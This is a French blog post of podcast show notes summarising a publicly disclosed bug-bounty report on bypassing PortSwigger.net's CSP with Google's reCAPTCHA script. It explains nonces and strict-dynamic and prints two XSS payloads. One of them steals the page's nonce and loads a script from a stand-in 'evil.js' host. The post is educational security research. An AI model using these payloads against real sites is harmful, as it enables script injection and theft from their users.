---
layout: post
title: "Service Hacktion - Notes attachées au balado S01E09 - Contournement CSP sur PortSwigger.net en utilisant un script Google"
lang: fr
categories:
  - security
tags:
  - podcast
  - balado
  - CSP
  - XSS
date: 2024/03/04 00:01:00
thumbnail: /images/service-hacktion-podcast.jpg
authorId: noraj
toc: true
---
Saison | Épisode
--- | ---
1 | 9

<iframe title="Spotify Embed: Service Hacktion" style="border-radius: 12px" width="624" height="351" frameborder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy" src="https://open.spotify.com/embed/show/2cvqgxJWv3mrwIWvR39Kyk/video?utm_source=oembed"></iframe>

- [Spotify](https://open.spotify.com/episode/0BP2L7d0mePNJYTaKTehkH)
- [Deezer](https://www.deezer.com/fr/episode/612172962)
- [Youtube](https://youtu.be/7EREQ3Dg9YE)
- [Youtube Music](https://music.youtube.com/watch?v=7EREQ3Dg9YE)
- [Amazon Music](https://music.amazon.fr/podcasts/985ea8b9-30bf-4145-a08a-1ecdc021f695/episodes/5325408e-e2e9-4e8e-b8c7-e9dd169798d1/service-hacktion-s01e09---contournement-csp-sur-portswigger-net-en-utilisant-un-script-google)
- [Google Podcast](https://podcasts.google.com/feed/aHR0cHM6Ly9hbmNob3IuZm0vcy9lZjcwNWIzMC9wb2RjYXN0L3Jzcw/episode/ZDUyNzI5OTYtMTc4OC00OTUzLWJkN2ItMTQ1ODZiM2UxYzFj)
- [Apple Podcast](https://podcasts.apple.com/fr/podcast/s01e09-contournement-csp-sur-portswigger-net-en-utilisant/id1725734663?i=1000648404551)
- [Podcast Index](https://podcastindex.org/podcast/6727486?episode=19936523697)
- [podCloud](https://podcloud.fr/podcast/service-hacktion/episode/s01e09-contournement-csp-sur-portswigger-point-net-en-utilisant-un-script-google)
- [Podchaser](https://www.podchaser.com/podcasts/service-hacktion-5564666/episodes/s01e09-contournement-csp-sur-p-203001327)
- [podtail](https://podtail.com/podcast/service-hacktion/s01e09-contournement-csp-sur-portswigger-net-en-ut/)
- [Podcasts Français](https://podcasts-francais.fr/podcast/service-hacktion/s01e09-contournement-csp-sur-portswigger-net-en-ut)
- [Vodio](https://www.vodio.fr/vodiotheque/i/rss-959-d5272996-1788-4953-bd7b-14586b3e1c1c/s01e09-contournement-csp-sur-portswigger-net-en-utilisant-un-script-google/)
- [Spreaker](https://www.spreaker.com/episode/s01e09-contournement-csp-sur-portswigger-net-en-utilisant-un-script-google--58964809)

## Notes

Article : 🇬🇧 [Johan Carlsson - CSP bypass on PortSwigger.net using Google script resources](https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/)

Johan Carlsson, pseudo joaxcar, est un développeur qui participe à des programmes de prime aux bogues (_bug bounty_).

[Son rapport de vulnérabilité](https://hackerone.com/reports/2279346) a été rendu public sur HackerOne.

Mise en garde :

- Il a rapporté un contournement de CSP seul, ça serait hors périmètre sur la plupart des autres programmes.
- Il est important de bien comprend sa cible et son modèle de menace.

Johan aime bien le contournement de CSP, car c'est un vaste sujet et qu'il est complexe d'écrire une bonne CSP.

La directive la plus importante est `script-src`. Souvent, on adopte soit une approche par liste blanche d'URL, soit on utilise un nombre aléatoire à usage unique (_nonce_).

Comment fonctionne un _nonce_ ?

1. Sur le serveur web, on génère une chaîne de caractères encodée en base64 ou en hexadecimal à partir de données générées aléatoirement. Les _nonces_ doivent être générés différemment à chaque chargement de la page. (À usage unique, _nonce_ = _number once_)
2. Ajout de l'attribut `nonce` à la balise `<script>`. (similaire anti-CSRF)
3. Envoyer le _nonce_ dans un en-tête CSP.
4. Le _nonce_ est pseudo-masqué dans le DOM :
  - `script.getAttribute("nonce");` ❌ (vide)
  - `script.nonce;` ✅ (seul moyen)
  - Par exemple, impossible à exfiltrer depuis un filtre d'attribut CSS

Particularité de la directive `strict-dynamic` : ça indique que la confiance explicitement donnée à un script de la page, par le biais d'un _nonce_ ou d'une empreinte, doit être propagée à tous les scripts chargés par celui-ci. Par exemple, pour une CSP `script-src 'strict-dynamic' 'nonce-abc' https://listeblanche.example.com/`, on ignore `self` pour `<script nonce="abc">exemple</script>` ou ignore la liste blanche d'URL pour `<script nonce="abc" src="https://example.com/script.js">` car il y a le _nonce_, mais `<script src="https://listeblanche.example.com/ex.js">` est interdit s'il n'y a pas le _nonce_, ça ignore donc les listes blanches d'URL. `strict-dynamic` autorise même des scripts sans _nonce_ si chargé depuis un script avec _nonce_.

Quand il n'y a pas `strict-dynamic`, abus avec script Captcha de Google :

```html
<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>

<img src=x ng-on-error='$event.target.ownerDocument.defaultView.alert(1)'>
```

Mais si on remplace `alert` par `eval`, c'est bloqué parce que `unsafe-eval` n'est pas autorisé. Ça donne une XSS très limitée. Il va falloir trouver le moyen d'avoir une XSS complète.

Une fausse idée assez répandue concernant le CSP est que la valeur du _nonce_ est cachée après le chargement du DOM. Ce n'est que partiellement vrai. En regardant le DOM dans les outils de développement après avoir chargé une page avec des scripts décorés avec des _nonces_, il n'y a pas de valeur de _nonce_ visible sur les balises de script, seulement un attribut de _nonce_ vide. Cela ne signifie toutefois pas que la valeur _nonce_ est supprimée ; elle est simplement cachée des canaux latéraux tels que CSS. La valeur est toujours accessible à partir de JavaScript.

On peut y accéder en JS avec `node.nonce`, ex :

```js
const nonce = document.querySelector("[nonce]").nonce;`.
```

On peut donc créer un nouveau script avec le même _nonce_ :

```html
<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>

<img src=x ng-on-error='
  doc=$event.target.ownerDocument;
  a=doc.defaultView.top.document.querySelector("[nonce]");
  b=doc.createElement("script");
  b.src="//example.com/evil.js";
  b.nonce=a.nonce; doc.body.appendChild(b)'>
```

Des contournements sans chaine complète comme le contournement d'un second facteur d'authentification est généralement accepté, mais pas un contournement de CSP seul. L'auteur a rapporté le contournement de CSP seul, car il n'a pas trouvé de XSS. Cela serait normalement hors-périmètre, mais il a jugé qu'ils accepteraient, car il avait vu qu'ils acceptaient des bogues de contournement de CSP induits par des composants tiers. Attention à ne pas faire pareil aveuglement et finir avec un rapport catégorisé en hors périmètre ou non applicable.

- Liste blanche : contournement avec JSONP, Angular, etc. Utilisation abusive d'une ressource autorisée.
- _nonce_ :
  - Si `strict-dynamic`, contournement identique à la liste blanche
  - Si sans `strict-dynamic`, il faudra en plus récupérer le _nonce_ d'un autre script
